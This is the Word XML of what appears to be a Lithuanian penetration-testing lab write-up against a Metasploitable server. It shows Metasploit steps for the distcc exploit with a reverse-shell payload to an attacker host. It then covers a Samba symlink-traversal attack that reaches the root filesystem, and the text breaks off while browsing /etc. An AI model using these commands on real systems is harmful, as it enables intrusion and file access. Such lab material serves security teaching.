                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C134B2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Use</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C134B2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>exploit/unix/misc/distcc_exec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6030" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5D7EBA67" w14:textId="43BB4366" w:rsidR="00B958F8"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021589C8" wp14:editId="0F537C73">
                  <wp:extent cx="3124200" cy="17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200" cy="171450"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005276E9" w:rsidRPr="00607DC0" w14:paraId="08F038B2" w14:textId="77777777" w:rsidTr="005276E9">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3420" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3B5CC3B7" w14:textId="67399A79" w:rsidR="005276E9" w:rsidRPr="00C134B2" w:rsidRDefault="005276E9"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t>set RHOST 192.168.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>177</w:t>
            </w:r>
            <w:r w:rsidRPr="00C134B2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6030" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="70CD2423" w14:textId="679848E4"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58313608" wp14:editId="72F2BDA0">
                  <wp:extent cx="3827780" cy="25209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7780" cy="252095"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005276E9" w:rsidRPr="00607DC0" w14:paraId="01BCBE27" w14:textId="77777777" w:rsidTr="005276E9">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3420" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6D104E39" w14:textId="252909F7" w:rsidR="005276E9" w:rsidRPr="00C134B2" w:rsidRDefault="005276E9" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005276E9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>set payload cmd/unix/reverse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6030" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2595DFF0" w14:textId="7DC7B836"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71F2E33B" wp14:editId="0E0432C4">
                  <wp:extent cx="3827780" cy="21209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7780" cy="212090"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005276E9" w:rsidRPr="00607DC0" w14:paraId="2D9B6CE1" w14:textId="77777777" w:rsidTr="005276E9">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3420" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="18A89BAC" w14:textId="1C078B2A" w:rsidR="005276E9" w:rsidRPr="005276E9" w:rsidRDefault="005276E9" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>set LHOST 192.168.177.129</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6030" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1768E164" w14:textId="1E3095CA"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48EF32CF" wp14:editId="1B7D1388">
                  <wp:extent cx="3827780" cy="30670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7780" cy="306705"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005276E9" w:rsidRPr="00607DC0" w14:paraId="2F85963B" w14:textId="77777777" w:rsidTr="005276E9">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3420" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="32D1CD8A" w14:textId="6DCFA157" w:rsidR="005276E9" w:rsidRPr="00C134B2" w:rsidRDefault="005276E9" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C134B2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6030" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="35C707DE" w14:textId="14AEB9D5"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0E1BE0AC" wp14:editId="5E86DF9E">
                  <wp:extent cx="3827780" cy="152590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7780" cy="1525905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005276E9" w:rsidRPr="00607DC0" w14:paraId="52DA484A" w14:textId="77777777" w:rsidTr="005276E9">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3420" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="584C6A60" w14:textId="6F77E6AF" w:rsidR="005276E9" w:rsidRPr="00C134B2" w:rsidRDefault="005276E9" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6030" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0699BC52" w14:textId="7B2A059C" w:rsidR="005276E9" w:rsidRPr="00607DC0" w:rsidRDefault="005276E9" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16262B95" wp14:editId="5162BAFC">
                  <wp:extent cx="3476625" cy="476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76625" cy="476250"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="69F3C818" w14:textId="485025B9" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45C3FE5A" w14:textId="77777777" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58B5FC5F" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Samba, kai sukonfigūruotas priėjimas su rašymo galimybe ir " wide links plačiosios nuorodos" yra leidžiamas (pagal nutylėjimą).  Gali būti naudojamas kaip slaptas priėjimas prie failų, kurie nebuvo skirti dalijimuisi (share). Žemiau pavyzdyje naudojamas Metasploit modulį suteikti prieigą prie šakninės failų sistemos, naudojant anoniminį prisijungimą su įrašymo galimybę.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589FB8DE" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0283F179" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>root@linux:~#</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> smbclient -L //IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD353C0" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Anonymous login successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3840A759" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2360CD76" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B6F052" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>        Sharename       Type      Comment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2E6C6E" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>        ---------       ----      -------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C028E5B" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>        print$          Disk      Printer Drivers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591BFD18" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>  tmp             Disk      Mūsų tikslas!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C958DD" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>        opt             Disk     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4462D347" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>        IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E501F17" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>        ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C57619" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C504E28" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>root@linux:~#</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD353C3" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>msf &gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> use auxiliary/admin/smb/samba_symlink_traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49413ABA" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">msf  auxiliary(samba_symlink_traversal) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>set RHOST IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6676D812" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">msf  auxiliary(samba_symlink_traversal) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>set SMBSHARE tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784C16F5" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">msf  auxiliary(samba_symlink_traversal) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A19AED7" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">msf auxiliary(samba_symlink_traversal) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66552F11" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CFB8B85" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>root@linux:~#</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> smbclient //IP/tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0924602F" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Anonymous login successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538AB015" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A91FAA3" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">smb: \&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>cd rootfs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D48ED00" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">smb: \rootfs\&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>cd etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B8CBCE" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
